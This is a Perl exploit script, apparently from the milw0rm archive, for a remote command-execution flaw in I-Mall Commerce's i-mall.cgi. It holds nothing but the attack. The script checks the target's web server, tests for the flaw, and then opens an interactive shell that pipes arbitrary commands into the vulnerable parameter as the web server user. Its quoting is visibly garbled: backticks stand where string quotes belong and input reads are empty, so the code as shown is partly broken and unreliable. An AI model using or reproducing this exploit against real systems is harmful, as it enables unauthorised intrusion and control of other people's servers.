I-Mall Commerce (i-mall.cgi) Remote Command Execution Exploit############################################## # I-Mall explo # Spawn bash style Shell with webserver uid # Greetz z\, spax, foxtwo, Zone-H # This Script is currently under development ############################################## use strict; use IO::Socket; my $host; my $port; my $command; my $url; my $shiz; my @results; my $probe; my @U; $U[1] = `/i-mall/i-mall.cgi?p=|`; &intro; &scan; &choose; &command; &exit; sub intro { &help; &host; &server; sleep 1; }; sub host { print `\nHost or IP : `; $host=; chomp $host; if ($host eq ``){$host=`127.0.0.1`}; $shiz = `|`; print `\nPort (enter to accept 80): `; $port=; chomp $port; if ($port =~/\D/ ){$port=`80`}; if ($port eq `` ) {$port = `80`}; }; sub server { my $X; print `\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`; $probe = `string`; my $output; my $webserver = `something`; &connect; for ($X=0; $X<=10; $X++){ $output = $results[$X]; if (defined $output){ if ($output =~/apache/){ $webserver = `apache` }; }; }; if ($webserver ne `apache`){ my $choice = `y`; chomp $choice; if ($choice =~/N/i) {&exit}; }else{ print `\n\nOK`; }; }; sub scan { my $status = `not_vulnerable`; print `\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`; my $loop; my $output; my $flag; $command=`dir`; for ($loop=1; $loop < @U; $loop++) { $flag = `0`; $url = $U[$loop]; $probe = `scan`; &connect; foreach $output (@results){ if ($output =~ /Directory/) { $flag = `1`; $status = `vulnerable`; }; }; if ($flag eq `0`) { }else{ }; }; if ($status eq `not_vulnerable`){ }; }; sub choose { my $choice=`1`; chomp $choice; if ($choice > @U){ &choose }; if ($choice =~/\D/g ){ &choose }; if ($choice == 0){ &other }; $url = $U[$choice]; }; sub other { my $other = ; chomp $other; $U[0] = $other; }; sub command { while ($command !~/quit/i) { print `[$host]\$ `; $command = ; chomp $command; if ($command =~/quit/i) { &exit }; if ($command =~/url/i) { &choose }; if ($command =~/scan/i) { &scan }; if ($command =~/help/i) { &help }; $command =~ s/\s/+/g; $probe = `command`; if ($command !~/quit|url|scan|help/) {&connect}; }; &exit; }; sub connect { my $connection = IO::Socket::INET->new ( Proto => `tcp`, PeerAddr => `$host`, PeerPort => `$port`, ) or die `\nSorry UNABLE TO CONNECT To $host On Port $port.\n`; $connection -> autoflush(1); if ($probe =~/command|scan/){ print $connection `GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n`; }elsif ($probe =~/string/) { print $connection `HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n`; }; while ( <$connection> ) { @results = <$connection>; }; close $connection; if ($probe eq `command`){ &output }; if ($probe eq `string`){ &output }; }; sub output{ my $display; if ($probe eq `string`) { my $X; for ($X=0; $X<=10; $X++) { $display = $results[$X]; if (defined $display){print `$display`;}; }; }else{ foreach $display (@results){ print `$display`; }; }; }; sub exit{ print `\n\n\n ORP`; exit; }; sub help { print `\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`; print `\n I-Mall E-Commerce Software i-mall.cgi Command Execution Vulnerability by SPABAM 2004` ; print `\n http://www.zone-h.org/advisories/read/id=4904 `; print `\n I-Mall Exploit v0.99beta18`; print `\n \n note.. web directory is normally /var/www/html`; print `\n`; print `\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)`; print `\n Command: SCAN URL HELP QUIT`; print `\n\n\n\n\n\n\n\n\n\n\n`; }; # milw0rm.com [2005-05-04]